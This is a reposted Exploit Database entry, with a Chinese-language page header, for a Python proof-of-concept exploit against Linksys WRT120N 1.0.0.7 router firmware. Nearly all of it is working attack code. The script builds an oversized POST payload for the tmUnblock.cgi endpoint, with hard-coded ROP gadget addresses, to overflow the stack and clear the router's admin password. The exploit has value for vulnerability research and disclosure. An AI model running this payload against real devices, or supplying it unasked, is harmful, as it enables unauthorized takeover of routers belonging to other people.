WRT120N 1.0.0.7 – Remote Stack Overflow

• Exploit Database
• 38 阅读

• 作者： Craig Heffner
  日期： 2014-02-19
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/31758/

• #!/usr/bin/env python
  #
  # WRT120N v1.0.0.7 stack overflow, ROP to 4-byte overwrite which clears the admin password.
  #
  # Craig Heffner
  # http://www.devttys0.com
  # 2014-02-14
  
  import sys
  import urllib2
  
  try:
  target = sys.argv[1]
  except IndexError:
  print "Usage: %s <target ip>" % sys.argv[0]
  sys.exit(1)
  
  url = target + '/cgi-bin/tmUnblock.cgi'
  if '://' not in url:
  url = 'http://' + url
  
  post_data = "period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL="
  post_data += "B" * 246# Filler
  post_data += "\x81\x54\x4A\xF0" # $s0, address of admin password in memory
  post_data += "\x80\x31\xF6\x34" # $ra
  post_data += "C" * 0x28 # Stack filler
  post_data += "D" * 4# ROP 1 $s0, don't care
  post_data += "\x80\x34\x71\xB8" # ROP 1 $ra (address of ROP 2)
  post_data += "E" * 8# Stack filler
  
  for i in range(0, 4):
  post_data += "F" * 4# ROP 2 $s0, don't care
  post_data += "G" * 4# ROP 2 $s1, don't care
  post_data += "\x80\x34\x71\xB8" # ROP 2 $ra (address of itself)
  post_data += "H" * (4-(3*(i/3)))# Stack filler; needs to be 4 bytes except for the
  # last stack frame where it needs to be 1 byte (to
  # account for the trailing "\n\n" and terminating
  # NULL byte)
  
  try:
  req = urllib2.Request(url, post_data)
  res = urllib2.urlopen(req)
  except urllib2.HTTPError as e:
  if e.code == 500:
  print "OK"
  else:
  print "Received unexpected server response:", str(e)
  except KeyboardInterrupt:
  pass